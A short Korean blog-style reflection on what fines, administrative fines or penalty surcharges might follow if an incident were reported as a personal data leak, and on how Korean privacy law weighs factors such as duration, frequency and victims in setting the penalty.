 

만약 해당 사안을 개인정보 유출로 신고한다면 어떠한 제재나 처벌을 받을지 고민해 보았다. 구체적으로 "A를 위반하면 B에 처한다"로 규정하지 않고 여러 조항에 걸쳐 "A를 위반하면 B, C에 처한다" 처럼 규정하고 있다. 따라서, 위반행위의 종류, 내용, 경위, 지속기간, 빈도, 주체, 피해자, 해당 기관의 개인정보 보호 관리체계 및 조치 등을 종합적으로 고려하여 경중을 따져 벌금, 과태료, 과징금 중에서 가장 합당한 처벌을 부과하는 것 같다고 생각한다.

+ Recent posts